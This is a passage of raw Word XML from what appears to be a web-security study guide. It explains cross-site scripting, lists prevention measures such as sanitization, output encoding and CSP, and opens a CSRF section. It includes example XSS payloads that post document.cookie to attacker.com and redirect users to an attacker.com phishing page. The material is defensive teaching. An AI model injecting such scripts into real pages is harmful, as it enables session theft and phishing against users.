          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The attacker injects a malicious script into the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C37F9" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="534"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When the victim’s browser loads the affected page, the script executes with the same permissions as the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC1A83" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="534"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The script can steal cookies, session tokens, or other sensitive information, or perform actions on behalf of the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F1B8E7"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Examples of XSS Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F614C" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cookie Theft</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21A645"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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F484C0"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fetch('http://attacker.com/steal', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9591F0"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method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C9C60"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body: document.cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7CFD7"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114D3117"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59610BDB" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Phishing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8058F"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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A1EB4"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window.location.href = 'http://attacker.com/phish?redirect=' + encodeURIComponent(document.location.href);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E8E4D6"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289FD2EA"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How to Prevent XSS Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B2770" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Input Validation and Sanitization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D4B1A8"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that all user inputs are validated for type, length, format, and range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B035D3"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sanitization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Strip out or encode dangerous characters in user inputs before including them in HTML, JavaScript, or CSS. Use libraries such as DOMPurify to help with sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DB78A" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Output Encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D472BCF"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Encode data before rendering it to the web page to prevent it from being interpreted as executable code. Use context-specific encoding (e.g., HTML encoding, JavaScript encoding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779490F8"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&lt;!-- HTML Encoding Example --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198A6B17" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A5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&lt;p&gt;Hello, &amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B0188" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Content Security Policy (CSP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B6B6BD"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement CSP headers to restrict the sources from which content (e.g., scripts, styles) can be loaded. This helps prevent unauthorized scripts from running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137CC324" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58"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Content-Security-Policy: default-src 'self'; script-src 'self';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456FACB" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Secure Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E018DD"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid using methods that directly insert untrusted content into the DOM (e.g., innerHTML, document.write). Use safer alternatives like textContent and setAttribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2684F7" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sanitize User Inputs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC7D7CA"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Always sanitize user inputs on both the client-side and server-side. Use libraries like validator or sanitize-html for this purpose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AE34FA" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Escape Special Characters</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633376E"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ensure that special characters are properly escaped when displaying user-generated content in HTML, JavaScript, or CSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E26449" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Inline JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792DF897"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid using inline JavaScript in HTML (e.g., in script tags or event handlers) as it can be a vector for XSS. Instead, use external JavaScript files and event listeners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A6C245" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regular Security Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77D65D"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regularly test your application for XSS vulnerabilities using automated tools and manual penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13678D06" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Framework Security Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699CD7D" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="536"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Utilize built-in security features provided by web frameworks and libraries that automatically handle input sanitization and output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556CF1A0" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E7053" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="537"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Least Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that scripts run with the minimum privileges required and that sensitive data is not exposed through JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A7FAE4" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="537"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Escape Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Properly escape data that is inserted into HTML, JavaScript, and CSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0750D566" w14:textId="77777777" w:rsidR="006F4A58" w:rsidRPr="00DA2F32" w:rsidRDefault="006F4A58" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="537"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Headers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use additional security headers like X-Content-Type-Options and X-Frame-Options to further enhance security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D23B1" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A288FEF" w14:textId="4B0CD36F" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc178383339"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w14:paraId="23E0D4FB" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of attack where an attacker tricks a user into unknowingly executing unwanted actions on a web application where the user is authenticated. This can lead to unauthorized actions being performed on behalf of the user, potentially compromising the security and integrity of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035758B6" w14:textId="77777777" w:rsidR="00623C71" w:rsidRPr="00DA2F32" w:rsidRDefault="00623C71" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
